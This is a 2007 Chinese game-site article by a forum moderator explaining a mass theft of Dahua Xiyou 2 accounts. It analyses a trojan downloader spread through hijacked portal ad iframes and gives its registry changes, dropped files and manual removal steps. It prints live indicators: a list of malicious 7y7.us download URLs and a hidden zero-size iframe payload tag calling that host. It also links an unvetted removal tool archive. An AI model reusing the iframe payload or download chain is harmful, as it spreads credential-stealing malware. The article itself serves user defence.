按关键字搜索：

召唤兽与坐骑

召唤兽成长率表初值上限表
 神兽及守护神

装备与作坊

炼化属性仙器传说
 作坊系统神兵系统
 法宝系统 11-14装备

任务心得

11-14称攻略 1-6坐骑
 转生任务保镖任务
 师门任务每周活动
 修罗任务帮派任务
 抓鬼任务 1-14称

高手进阶

五行系统神兽系统
 地煞星两小无猜
 商旅任务宝石拆解

您的位置: > 首页

/ 大话西游2 / 大话攻略 / 关于最近大话号批量被盗的几点说明！

关于最近大话号批量被盗的几点说明！

作者：shanzei444 文章来源：本站日期：2007-06-05 责任编辑：微微浏览： 神兽交易

最近看了很多的帖子都说大话号莫名其妙的被盗。经过这几天的对大量当事人的咨询（173位被盗号的朋友）。经过甄选。报送20CN网络小组，黑鹰等国内知名电脑病毒类网站。得出以下结论！

2007年5月12日下午5点左右。太平洋电脑网接网友来报，称网易、新浪、Tom、QQ等站点都被挂上木马，经检查后发现，木马均挂在allyes广告系统中。这一广告嵌在iframe中，不易在源代码中发现。（图1即为网易当时被挂马的截图）资讯连接地址：

http://www.pconline.yzz.cn.yzz.cn/pcedu/softnews/bingdu/0705/1014188.html

也就是说当日浏览过这些网站的朋友已经全部中毒了！！！我不知道为什么网易没有发出通告。可能是为了自己那可怜的面子！！！玩家的利益才在最终的利益。让这么多人损失这么大。网易有不可推卸的责任！！！

被挂的木马为：Virus.Win32.AutoRun.p

此病毒为（“下载者”变种）该病毒是一个木马下载器,当发现受感染电脑的IE可用时,它会自动连接多个恶意站点,下载其他的多个木马病毒,下载的病毒都是一些盗号木马病毒,对用户的网络虚拟财产构成严重的威胁。此外,这次的变种会通过感染电脑的可移动磁盘，达到扩散病毒的目的，极有可能造成病毒蔓延的现象，建议用户提高警惕，捍卫电脑的安全。

发作症状：该病毒运行后，会将自身复制为BinNice.bak,同时释放一个BinNice.dll病毒文件。注入到系统进程explorer.exe里,连接多个恶意站点,进行病毒下载。向可移动磁盘中释放Ghost.pif和autorun.inf病毒文件，以其来传播自身。

此病毒传播途径绝大部分为IE，通过病毒样本可以看出，此病毒同之前臭名昭著的毒网7y7.us是一个团伙。此病毒利用微软MS06-014和MS07-017漏洞网页木马来下载病毒，并进行ARP攻击。它企图将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\下面的某些注册表项（看下面）全部删除！而且还利用romdrivers.dll插入到用户进程一起删除那些注册表项！此病毒将除了自己以外的所有一般病毒的感染键值全部删除。也就是说它企图排除异己的病毒，达到霸占计算机的目的。

这些是它删除的键值：

{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
{754FB7D8-B8FE-4810-B363-A788CD060F1F}
{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
{06A68AD9-FF56-6E73-937B-B893E72F6226}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
{42A612A4-4334-4424-4234-42261A31A236}
{DE35052A-9E37-4827-A1EC-79BF400D27A4}
{AEB6717E-7E19-11d0-97EE-00C04FD91972}
{DD7D4640-4464-48C0-82FD-21338366D2D2}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
{131AB311-16F1-F13B-1E43-11A24B51AFD1}
{274B93C2-A6DF-485F-8576-AB0653134A76}
{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8

之后插入此病毒的键值：

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{09B68AD9-FF66-3E63-636B-B693E62F6236}
HKCR\CLSID\{09B68AD9-FF66-3E63-636B-B693E62F6236}
dll文件指向C:\Program Files\Internet Explorer\romdrivers.dll

在HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations添加：
\??\C:\Program Files\Internet Explorer\romdrivers.bkk
!\??\C:\Program Files\Internet Explorer\romdrivers.dll

创建：HKCU\Software\SetVer\ver，在下面创建键值ME，值为1.25

之后他便成为一个名副其实的“下载者”了，企图利用被插入了病毒模块的explorer.exe访问它们的毒网，之后下载下面的一堆东西到%temp%目录，并陆续运行他们：

http://7y7.us/oK/svchost.exe
http://7y7.us/Sign/csrss.exe
http://7y7.us/Sign/svchost32.exe
http://7y7.us/Sign/smss.exe
http://7y7.us/Sign/services.exe
http://7y7.us/Sign/svchost.exe
http://7y7.us/Sign/conime.exe
http://7y7.us/Sign/ctfmon.exe
http://7y7.us/Sign/mmc.exe
http://7y7.us/Sign/IEXPLORE.EXE
http://7y7.us/Sign/stpgldk.exe
http://7y7.us/Sign/srogm.exe
http://7y7.us/Sign/spglsdr.exe
http://7y7.us/Sign/copypfh.exe

之后改动文件安装全局钩子，将病毒dll文件注入系统中存在的进程。
每个都在%temp%目录生成一个exe文件的副本和一个dll文件，接着退出并利用explorer.exe将原来的删除
文件列表：
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\csrss.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\woso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\woso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost32.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\smss.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fyso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fyso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\svchost.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jtso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jtso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\conime.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wlso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wlso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ctfmon.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mmc.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wmso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wmso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IEXPLORE.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qjso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qjso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\stpgldk.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\srogm.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wdso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wdso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\spglsdr.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\copypfh.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\daso.exe（大话西游盗号木马）
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\daso0.dll

倒数第二个即为这次大批量盗号的元凶！

此病毒也可以通过网吧，路由器等传播。就是说在网吧上过网。用过USB等等移动存储设备，一台电脑中毒，其他和这个电脑连接着路由器的电脑一样中毒。

提醒各网吧管理员：中毒的主机要想用ARP攻击，就得不断变化自己的MAC地址来截取和发送数据包。交换机上的哪台机器的流量最大。灯狂闪。就是它了。

手动清理方法

准备工具：icesword 1.20

首先打开任务管理器，在explorer.exe上面右键——结束进程树；

接着用任务管理器打开icesword并退出任务管理器，转到文件选项卡，进入
C:\Program Files\Internet Explorer\目录，选择romdrivers.dll、
romdrivers.bkk和romdrivers.bak，之后右键——强制删除

转到C:\Documents and Settings\当前用户名\Local Settings\Temp目录，按一
下创建时间，然后在那堆创建时间一样的exe和dll文件上面右键——强制删除

调出任务管理器并用它打开regedit（用icesword的注册表选项卡也可以，但那个
操作不太方便）接着把下面的注册表项或者键值删除：

HKCR\CLSID\{09B68AD9-FF66-3E63-636B-B693E62F6236}

HKCU\Software\SetVer\ver

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面的那一堆启动项

HKLM\SYSTEM\ControlSet001\Control\SessionManager\PendingFileRenameOperations里面的\??\C:\Program Files\Internet Explorer\romdrivers.bkk以及!\??\C:\Program Files\Internet Explorer\romdrivers.dll这两行；

然后将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks下面的{09B68AD9-FF66-3E63-636B-B693E62F6236} 重命名为{AEB6717E-7E19-11d0-97EE-00C04FD91972}

至于%windir%\system32\drivers\ect\下面的那个hosts文件，如果没有修改过，随便新建一个空的就可以了

重启，OK。

附加
病毒样本：
<iframe src=http://7y7.us/1.htm width=0 height=0></iframe> <html>

<head>
<meta http-equiv="Content-Type" c>
<title>[VBnet Internet] Public IP Address SSI Page</title>
</head>

<body>

任何病毒都是通过系统漏洞传播的。如果把微软通告的补丁全部打全，是90%不会出问题的。叶子猪于早前已经提醒过大家，微软的ANI安全漏洞很严重。一定要把系统补丁打全。对于这次大规模发生的盗号事件。只能说惋惜，遗憾。对于其他怀疑叶子猪网站的朋友，我只能说，没有最好。只有更好。我也只是一个版主，没权利代替叶子猪说什么话。但是，引用一位管理员的话：“我们是把玩家的利益和安全放第一位的”

附加一个专杀工具，于5月17日发布，这是我自己在网上找的，请使用前先检查杀毒！！！

http://hzyo.yzz.cn/killvirus.rar